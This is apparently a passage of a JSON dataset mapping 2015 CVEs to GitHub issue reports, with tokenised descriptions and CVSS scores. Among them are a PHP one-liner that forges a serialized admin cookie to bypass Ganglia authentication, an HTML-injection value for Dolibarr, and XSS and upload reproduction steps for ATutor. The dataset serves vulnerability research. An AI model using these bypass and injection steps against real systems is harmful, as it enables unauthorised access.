        "description": "Post Auth RCE Not Fixed, its now a race condition :). The Post Auth RCE allegedly \"fixed\" in Commit b1b3fd6 URLTAG is not fixed. The fix simply makes the bug slightly harder to exploit, turning it from a straight shot file upload bug into a lovely race condition. Also, I bypassed the blacklist again :) Video Proof below, a APITAG will be published along with a full writeup of the vulnerability in due course, and a CVE will be requested from MITRE. ![IMAGE ALT TEXT HERE URLTAG Suggested fix: Validate images BEFORE writing to disc. Writing them to disc, then checking them, is a bad idea.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2015-6250",
        "Issue_Url_old": "https://github.com/claviska/simple-php-captcha/issues/16",
        "Issue_Url_new": "https://github.com/yasirmturk/simple-php-captcha/issues/16",
        "Repo_new": "yasirmturk/simple-php-captcha",
        "Issue_Created_At": "2015-07-30T23:02:28Z",
        "description": "Captcha bypass vulnerability. The FILETAG file has a vulnerability enabling a client to generate the captcha response automatically, effectively bypassing the captcha. Since APITAG is used both in the initial seed for the captcha and in the captcha url path sent to the client, it is possible to generate the captcha result automatically by running the same code client side. I can share a proof of concept privately if you need it. Just let me know how to reach you.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-6521",
        "Issue_Url_old": "https://github.com/atutor/ATutor/issues/103",
        "Issue_Url_new": "https://github.com/atutor/atutor/issues/103",
        "Repo_new": "atutor/atutor",
        "Issue_Created_At": "2015-08-11T16:05:23Z",
        "description": "Persistent cross site scripting and file upload attacks possible in course management. Persistent cross site scripting and file upload attacks possible in course management Course management is lacking input validation in many places that allows stored XSS attacks and malicious file upload. Following are the vulnerable regions NUMBERTAG Create course: The course name is not validated that allows to inject a javascript query into the name field. Steps to reproduce: Instructor A creates a course with a script in course name as follows: APITAG APITAG Another script in banner. APITAG APITAG Login as admin. When you click on courses, the APITAG pops up. Every time the course profile is checked by the student, the APITAG also pops up. Severity is high as admin could be attacked NUMBERTAG File Upload in course There are illegal file extensions mentioned where all the executable files are checked. But a file without any extension is accepted. This could be a binary executable file. Filename It is possible to mount a javascript into this variable. Filename is not validated. File content An attacker can write a malicious script into the file content and upload. Steps to reproduce: Instructor A goes to his course and then go to file storage. Clicks on create a new file. The file name is given as : APITAG APITAG The file content is given as APITAG APITAG Now a APITAG logs in. As soon as a page displaying file name comes, the script APITAG gets popped up even without clicking on it. If the content is downloaded, the alert APITAG pops up. This is of very high severity as this allows an instructor to post a virus as a file upload. Every student gets attacked. Even the administrator while accessing the course get attacked if the attack is mounted. Solution: Against XSS: Input validation using APITAG Against file upload: Use a whitelist of extensions that are allowed to be uploaded rather than extensions that are not allowed.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2015-6567",
        "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/625",
        "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/625",
        "Repo_new": "wolfcms/wolfcms",
        "Issue_Created_At": "2015-05-05T09:58:54Z",
        "description": "Security Issue: Unrestricted File Upload. Hello There Wolf CMS ! Greeting From Bhati While looking at your cms version NUMBERTAG i found that, an authenticated user can upload a malicious arbitrary file to server which allow him to take over the web server access like command execution where an user can act as server admin. Looking forward for your response so i can share the details with you ! it will better if we discuss in email so the information will not disclose here !",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-6816",
        "Issue_Url_old": "https://github.com/ganglia/ganglia-web/issues/267",
        "Issue_Url_new": "https://github.com/ganglia/ganglia-web/issues/267",
        "Repo_new": "ganglia/ganglia-web",
        "Issue_Created_At": "2015-09-04T17:31:37Z",
        "description": "APITAG auth bypass. It's easy to bypass auth by using boolean serialization like this: $ php r \"echo APITAG 'group'=>'admin', 'token'=>true)));\" Vulnerable code listed below: URLTAG APITAG { $cookie = $_COOKIE['ganglia_auth']; // magic quotes will break unserialization if($this APITAG { $cookie = stripslashes($cookie); } $data = unserialize($cookie); if(array_keys($data) != APITAG { return false; } if($this APITAG == $data['token']) { // Found by APITAG // Exploit: curl H APITAG APITAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-6817",
        "Issue_Url_old": "https://github.com/pgbouncer/pgbouncer/issues/69",
        "Issue_Url_new": "https://github.com/pgbouncer/pgbouncer/issues/69",
        "Repo_new": "pgbouncer/pgbouncer",
        "Issue_Created_At": "2015-09-01T20:07:28Z",
        "description": "A failed auth_query lookup leads to connection as auth_user!. Per mailing list report ( URLTAG use of auth_user and auth_query works fine, until an invalid user is entered, in which case the login falls back to the auth_user. I traced this back to a problem in client.c, inside handle_auth_response. When we find a match from the query and parse it by seeing a 'D' packet, we set client >auth_user to the new entry. However, if not 'D' is seen, and we skip straight to 'C' and 'Z', the code sees the lack of a client >auth_user as an indication that the above failed. This is not true, however, as auth_user is already set (to the config auth_user value). Thus, getting no rows back from the auth_query lets one log in as the powerful auth_user user. Patch coming soon.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2015-6961",
        "Issue_Url_old": "https://github.com/web2py/web2py/issues/731",
        "Issue_Url_new": "https://github.com/web2py/web2py/issues/731",
        "Repo_new": "web2py/web2py",
        "Issue_Created_At": "2015-01-26T21:11:01Z",
        "description": "Open Redirection Vulnerability. APITAG FILETAG on October NUMBERTAG Issue Open Redirection TO Any Domain Dependency For Successful Redirection We Need Administration Password Only Unauthenticated Users Are Affected , If an user is already authenticated on web2py then he will not get redirec , Apart from this , Users who are non authenticated like APITAG Users\" Will get redirection successfully\" Severity Medium ( According To Me ) =D Correct me if i am wrong Tested On Web2py Tester Version From Official Site Reported By Narendra Bhati APITAG Here i have tested this issue on Tested version provided by Web2py Official Site What steps will reproduce the problem NUMBERTAG FILETAG ( successful redirection tested on APITAG Version Of Web2py Latest Version NUMBERTAG Replace the password parameter value to your administration password NUMBERTAG After replacing the valid password enter any domain and you will ger redirected What is the expected output? What do you see instead? What version of the product are you using? On what operating system? Please provide any additional information below. APITAG issue: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-7225",
        "Issue_Url_old": "https://github.com/tinfoil/devise-two-factor/issues/45",
        "Issue_Url_new": "https://github.com/tinfoil/devise-two-factor/issues/45",
        "Repo_new": "tinfoil/devise-two-factor",
        "Issue_Created_At": "2015-09-10T12:40:07Z",
        "description": "Security Bug. Hi, Can you take a look at CVETAG ?",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 3.6,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2015-7294",
        "Issue_Url_old": "https://github.com/vesse/node-ldapauth-fork/issues/21",
        "Issue_Url_new": "https://github.com/vesse/node-ldapauth-fork/issues/21",
        "Repo_new": "vesse/node-ldapauth-fork",
        "Issue_Created_At": "2015-05-22T02:14:37Z",
        "description": "Vulnerable to ldap injection. The username is not filtered as per ldap specifications so the code seems to be vulnerable to ldap injection: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-7384",
        "Issue_Url_old": "https://github.com/nodejs/node/issues/3138",
        "Issue_Url_new": "https://github.com/nodejs/node/issues/3138",
        "Repo_new": "nodejs/node",
        "Issue_Created_At": "2015-09-30T22:42:05Z",
        "description": "CVETAG Denial of Service Vulnerability. APITAG posted @ APITAG _ Description and CVSS Score A bug exists in FILETAG versions NUMBERTAG to NUMBERTAG whereby an external attacker can cause a denial of service. The severity of this issue is high (see CVSS scoring below) and users of the affected versions should plan to upgrade when a fix is made available. Versions NUMBERTAG and NUMBERTAG of FILETAG are not affected . Versions NUMBERTAG and NUMBERTAG of FILETAG are vulnerable . Versions NUMBERTAG and NUMBERTAG of FILETAG are not affected but remain unsupported and users of these versions are encouraged to migrate to FILETAG NUMBERTAG at their earliest convenience. Version NUMBERTAG of FILETAG is vulnerable and while FILETAG NUMBERTAG is unsupported, a patch release with a fix will be made available some time next week. Users of FILETAG NUMBERTAG are encouraged to migrate to FILETAG NUMBERTAG as a matter of priority. Full details of this vulnerability are embargoed until a new NUMBERTAG release is made available on Monday the NUMBERTAG th of October NUMBERTAG UTC. Common Vulnerability Scoring System (CVSS NUMBERTAG Base Score: | Metric | Score | | | | | Base Score NUMBERTAG APITAG | | Base Vector: | PATHTAG URLTAG | Attack Vector: | Network (AV:N) | | Attack Complexity: | Medium (AC:H) | | Privileges Required: | None (PR:N) | | User Interaction: | None (UI:N) | | Scope of Impact: | Unchanged (S:U) | | Confidentiality Impact: | None (C:N) | | Integrity Impact: | None (I:N) | | Availability Impact: | High (A:H) | Complete CVSS NUMBERTAG ector: PATHTAG URLTAG . Refer to the CVSS NUMBERTAG Specification URLTAG for details on the meanings and application of the vector components. CVETAG is listed on the MITRE CVE dictionary CVETAG and NIST NVD URLTAG . Action and updates A new NUMBERTAG release on Monday the NUMBERTAG th of October NUMBERTAG will be made available with appropriate fixes for this vulnerability along with disclosure of the details of the bug to allow for complete impact assessment by users. A new FILETAG NUMBERTAG release will be made on or after Monday the NUMBERTAG th of October NUMBERTAG for users having trouble migrating to FILETAG NUMBERTAG however this release does not indicate continued official support of FILETAG release lines. Contact and future updates Please contact EMAILTAG rg if you wish to report a vulnerability in FILETAG . Please subscribe to the low volume announcement only nodejs sec mailing list at URLTAG to stay up to date with security vulnerabilities in FILETAG and the projects maintained in the nodejs APITAG organisation URLTAG .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-7510",
        "Issue_Url_old": "https://github.com/systemd/systemd/issues/2002",
        "Issue_Url_new": "https://github.com/systemd/systemd/issues/2002",
        "Repo_new": "systemd/systemd",
        "Issue_Created_At": "2015-11-23T18:16:34Z",
        "description": "Stack overflows in nss_mymachines ( CVETAG ). The getpwnam and getgrnam implementations in APITAG have stack overflows due to an unconstrained alloca call (hidden behind strndupa ). Example for getpwnam : [fweimer MENTIONTAG ~]$ grep mymachines APITAG passwd: files sss mymachines group: files sss mymachines hosts: files dns myhostname mymachines [fweimer MENTIONTAG ~]$ python3 c \"import pwd; APITAG NUMBERTAG Segmentation fault (core dumped) This has been assigned CVETAG for tracking purposes.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-7529",
        "Issue_Url_old": "https://github.com/sosreport/sos/issues/696",
        "Issue_Url_new": "https://github.com/sosreport/sos/issues/696",
        "Repo_new": "sosreport/sos",
        "Issue_Created_At": "2015-12-04T16:25:23Z",
        "description": "CVETAG predictable tmp files usage. Mateusz Guzik reports that sos NUMBERTAG is vulnerable to symbolic link attacks since it uses predictable temporary file names in the configured APITAG location. If this location is shared with other users (the default on most distributions) then it is possible for a malicious user to obtain content from the archive and in some circumstances to execute arbitrary commands with administrative privileges. There are two recommended mitigations for these attacks: Use a private temporary directory (all versions, all kernels) Instead of using the default system temporary directory ( APITAG , APITAG ) use a private directory that excludes non administrative users from searching or reading the directory contents, e.g.: APITAG Note that the chmod is not strictly necessary assuming the root user's umask is set appropriately. Enable kernel link protection (partial mitigation, requires kernel support) Recent kernels support the APITAG feature that can be used to mitigate this class of attack and this is enable by default by most distributions that support the feature: ERRORTAG Note that relying on the APITAG feature does not entirely eliminate risk: an attacker could create a regular file that they own (in place of the output file sos expects to create) and use this to obtain archive content that would not normally be exposed to their user and group ID. Users of sosreport are recommended to use an alternate APITAG setting whenever possible. A fix for this problem is currently in master and will be included in the next sos release. This may be backported to earlier releases carried by distributions. Concerned users should contact their distribution's normal support channels for information regarding updated packages to fix this flaw.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2015-7764",
        "Issue_Url_old": "https://github.com/Netflix/lemur/issues/117",
        "Issue_Url_new": "https://github.com/netflix/lemur/issues/117",
        "Repo_new": "netflix/lemur",
        "Issue_Created_At": "2015-10-06T20:52:39Z",
        "description": "Certificates encrypted with static IV. The IV is static per key at least. Lemur is using sqlalchemy_utils to encrypt certificates. This in turn encrypts with AES in CBC mode. URLTAG Given a single key, it will use the SHA NUMBERTAG hash of that key for all encryption. It looks like it will use the first NUMBERTAG bytes of that hash as the IV for each operation. I wanted to get your thoughts on it since setting up Lemur is my primary concern at the moment. Unless there's something I'm missing, I'll report it upstream as well.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-7764",
        "Issue_Url_old": "https://github.com/kvesteri/sqlalchemy-utils/issues/166",
        "Issue_Url_new": "https://github.com/kvesteri/sqlalchemy-utils/issues/166",
        "Repo_new": "kvesteri/sqlalchemy-utils",
        "Issue_Created_At": "2015-10-06T20:56:40Z",
        "description": "APITAG uses static IV per key. APITAG uses AES in CBC mode. The IV that it uses is not random though. URLTAG Given a single key, it will use the SHA NUMBERTAG hash of that key for all encryption. It looks like it will use the first NUMBERTAG bytes of that hash as the IV for each operation. This link is a good primer on why this is bad: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-8026",
        "Issue_Url_old": "https://github.com/relan/exfat/issues/5",
        "Issue_Url_new": "https://github.com/relan/exfat/issues/5",
        "Repo_new": "relan/exfat",
        "Issue_Created_At": "2015-09-09T09:09:36Z",
        "description": "out of bounds write / heap overflow in exfatfsck in function APITAG This input file can trigger a heap overflow in exfatfsck: URLTAG This was found while fuzzing with the tool american fuzzy lop. Here is the stack trace from address sanitizer NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ef NUMBERTAG at pc NUMBERTAG b bp NUMBERTAG ffdeb0bf9d0 sp NUMBERTAG ffdeb0bf NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ef NUMBERTAG thread T NUMBERTAG a in __interceptor_pread NUMBERTAG PATHTAG NUMBERTAG e NUMBERTAG f5 in verify_vbr_checksum PATHTAG NUMBERTAG e NUMBERTAG f5 in exfat_mount PATHTAG NUMBERTAG dd NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG f9f in __libc_start_main PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG ef NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG bdfd2 in __interceptor_malloc ( PATHTAG NUMBERTAG e NUMBERTAG in exfat_mount PATHTAG SUMMARY: APITAG heap buffer overflow NUMBERTAG interceptor_pread NUMBERTAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9df0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2015-8080",
        "Issue_Url_old": "https://github.com/antirez/redis/issues/2855",
        "Issue_Url_new": "https://github.com/redis/redis/issues/2855",
        "Repo_new": "redis/redis",
        "Issue_Created_At": "2015-11-05T23:56:32Z",
        "description": "Integer overflow (leading to stack based buffer overflow) in embedded lua_struct.c. [re posting via github after private reporting, as agreed with antirez] Embedded copy of lua_struct.c suffers of an integer overflow in the APITAG parser that can be used to trigger (at least) a stack based buffer overflow. This affects all released versions of redis in both NUMBERTAG and NUMBERTAG branches. The following code is part of APITAG ERRORTAG APITAG can be tricked into an integer wraparound with a large size number as input, thus returning a negative value. APITAG has no lower bound/negative check; moreover, there is an implicit int > APITAG promotion, yielding a very large (unsigned) size value. This, plus further int / APITAG confusion in the whole module, results in stack based buffer overflows in other places, eg. APITAG reachable in LUA via APITAG . Simple APITAG as follow: APITAG Where NUMBERTAG is a user controlled index, larger than APITAG , fooling APITAG '>I' is there to reach a buffer overflow in APITAG NUMBERTAG is a user controlled input stored into value This will result in memory corruption due a user controlled write outside of a (stack based) array. Running the APITAG above, this can be observed from gdb: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-8309",
        "Issue_Url_old": "https://github.com/devsnd/cherrymusic/issues/598",
        "Issue_Url_new": "https://github.com/devsnd/cherrymusic/issues/598",
        "Repo_new": "devsnd/cherrymusic",
        "Issue_Created_At": "2015-11-18T10:03:58Z",
        "description": "Security vulnerabilities discovered. Hi, Could you please get in touch with me to discuss NUMBERTAG ulnerabilities I've discovered in cherrymusic. feedersec [at] gmail [dot] com. Thanks.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-8400",
        "Issue_Url_old": "https://github.com/shellinabox/shellinabox/issues/355",
        "Issue_Url_new": "https://github.com/shellinabox/shellinabox/issues/355",
        "Repo_new": "shellinabox/shellinabox",
        "Issue_Created_At": "2015-12-02T09:56:27Z",
        "description": "HTTP fallback via \"/plain\" allows opportunity for DNS rebinding attack. The shellinabox server, while using the HTTPS protocol, allows HTTP fallback through the \"/plain\" URL. This exposes the opportunity for a potential DNS rebinding attack, by malicious APITAG loaded in the context of the user browser, that would allow connection to shellinabox in the time window between server startup and user reconfiguration of default credentials (scenario is vanilla installation of, as an example, an embedded system). The \"/plain\" fallback should be disabled by default to improve security and mitigate such an attack. Credit goes to Stephen R\u00f6ttger from the Google Security Team for identifying the issue.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.4,
        "impactScore": 4.0,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-8559",
        "Issue_Url_old": "https://github.com/chef/chef/issues/3871",
        "Issue_Url_new": "https://github.com/chef/chef/issues/3871",
        "Repo_new": "chef/chef",
        "Issue_Created_At": "2015-09-03T22:22:50Z",
        "description": "knife bootstrap leaks validator.pem private key into system logs. When you 'knife bootstrap' a node, the validator.pem private RSA key is leaked into the system logs PATHTAG The reason is that 'knife bootstrap' constructs a shell command to run on the node from a template, filling the private key in as a here doc (see URLTAG This command is invoked via (more or less): ssh node 'sudo sh c full command goes here' As a result, the private key ends up on the command line, in the process table, and, by way of sudo command logging on most reasonable systems, in the system logs. The logs may also be forwarded to other places (possibly in clear text), and possible stored on other systems, making the private validator key not quite so private any more.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-8612",
        "Issue_Url_old": "https://github.com/blueman-project/blueman/issues/416",
        "Issue_Url_new": "https://github.com/blueman-project/blueman/issues/416",
        "Repo_new": "blueman-project/blueman",
        "Issue_Created_At": "2015-12-18T11:27:11Z",
        "description": "Privilege escalation in blueman DBUS API. Just saw this online: URLTAG Seems related to this: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.4,
        "impactScore": 5.9,
        "exploitabilityScore": 2.5
    },
    {
        "CVE_ID": "CVE-2015-8618",
        "Issue_Url_old": "https://github.com/golang/go/issues/13515",
        "Issue_Url_new": "https://github.com/golang/go/issues/13515",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2015-12-06T19:40:07Z",
        "description": "APITAG Incorrect results on NUMBERTAG bit platforms. CODETAG I get different results whether I run it in amd NUMBERTAG mode or NUMBERTAG mode CODETAG The first one is correct (you can verify this with python thus) CODETAG The playground also gives the incorrect results URLTAG .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-8685",
        "Issue_Url_old": "https://github.com/Dolibarr/dolibarr/issues/4291",
        "Issue_Url_new": "https://github.com/dolibarr/dolibarr/issues/4291",
        "Repo_new": "dolibarr/dolibarr",
        "Issue_Created_At": "2015-12-24T17:52:10Z",
        "description": "HTML Injection in \"import external calendar\". Hi, You have a html injection in field \"url\" from the external calendar. You only need to edit the url parameter like: \">< h1>injection APITAG to see the html injection. Regards FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-8702",
        "Issue_Url_old": "https://github.com/inspircd/inspircd/issues/1033",
        "Issue_Url_new": "https://github.com/inspircd/inspircd/issues/1033",
        "Repo_new": "inspircd/inspircd",
        "Issue_Created_At": "2015-04-16T07:59:42Z",
        "description": "Inspircd S2S UID command error from specific ISP. I am using inspircd NUMBERTAG and when a user connect from this ISP APITAG inspircd return the following error: ERRORTAG Protocol specification: APITAG User connection: CODETAG Visual comparation FILETAG You can see a white space between NUMBERTAG APITAG Why the hostname has white space? Is it possible inspircd bug? When this error occurred the two servers had a netsplit. Thanks by advance.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.6,
        "impactScore": 4.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-8786",
        "Issue_Url_old": "https://github.com/rabbitmq/rabbitmq-management/issues/97",
        "Issue_Url_new": "https://github.com/rabbitmq/rabbitmq-management/issues/97",
        "Repo_new": "rabbitmq/rabbitmq-management",
        "Issue_Created_At": "2015-12-29T05:25:23Z",
        "description": "Validate (limit) user provided query parameters, e.g. lengths_age. APITAG and APITAG need to be validated and capped the same way page size is.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-8851",
        "Issue_Url_old": "https://github.com/broofa/node-uuid/issues/108",
        "Issue_Url_new": "https://github.com/broofa/node-uuid/issues/108",
        "Repo_new": "broofa/node-uuid",
        "Issue_Created_At": "2015-03-23T22:52:46Z",
        "description": "crypto API isn't used in FILETAG context. After commit APITAG Node Crypto API isn't used anymore. I'm not sure if this is critical as NUMBERTAG is random or pseudo random based (RFC advise on usage of cryptographic quality random numbers but doesn't require it in any way). I'm not sure if this is something that planned to be fixed ( APITAG is significally faster and this may be a good reason to keep it that way and not to use Crypto API by default). As for now I'm using APITAG passing ERRORTAG as random generator.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-8851",
        "Issue_Url_old": "https://github.com/broofa/node-uuid/issues/122",
        "Issue_Url_new": "https://github.com/broofa/node-uuid/issues/122",
        "Repo_new": "broofa/node-uuid",
        "Issue_Created_At": "2015-11-07T23:36:47Z",
        "description": "FILETAG SECURITY VULN: false === APITAG == 'function'). I've tested this on FILETAG NUMBERTAG and node.js NUMBERTAG Tested with npm install save node uuid MENTIONTAG Discovered this after posting a joke on twitter URLTAG and then decided to actually try replacing APITAG with an error throwing function to as part of a security audit on my software and its modules. ERRORTAG Should be ERRORTAG , pull requesting....",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-8863",
        "Issue_Url_old": "https://github.com/stedolan/jq/issues/995",
        "Issue_Url_new": "https://github.com/stedolan/jq/issues/995",
        "Repo_new": "stedolan/jq",
        "Issue_Created_At": "2015-10-18T17:07:03Z",
        "description": "Heap based buffer overflow in APITAG On Sun, Oct NUMBERTAG at NUMBERTAG Jakub Wilk wrote: > Package: jq > Version NUMBERTAG dfsg NUMBERTAG Usertags: afl > > There's heap based buffer overflow in APITAG > > $ valgrind jq . FILETAG NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright > info NUMBERTAG Command: jq . FILETAG NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG D NUMBERTAG B: check_literal APITAG NUMBERTAG by NUMBERTAG E NUMBERTAG jv_parser_next APITAG NUMBERTAG by NUMBERTAG C: jq_util_input_next_input APITAG NUMBERTAG by NUMBERTAG D3C9: main APITAG NUMBERTAG Address NUMBERTAG b7c5e8 is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG A1DC: malloc (in > PATHTAG NUMBERTAG by NUMBERTAG C3D0: realloc (in > PATHTAG NUMBERTAG by NUMBERTAG B NUMBERTAG jv_mem_realloc APITAG NUMBERTAG by NUMBERTAG D NUMBERTAG tokenadd APITAG NUMBERTAG by NUMBERTAG E NUMBERTAG scan APITAG NUMBERTAG by NUMBERTAG E NUMBERTAG jv_parser_next APITAG NUMBERTAG by NUMBERTAG C: jq_util_input_next_input APITAG NUMBERTAG by NUMBERTAG D3C9: main APITAG > ... > > APITAG that I rebuilt the package with noopt to make the backtrace more > useful.) > > This bug was found using American fuzzy lop: > URLTAG see CVETAG",
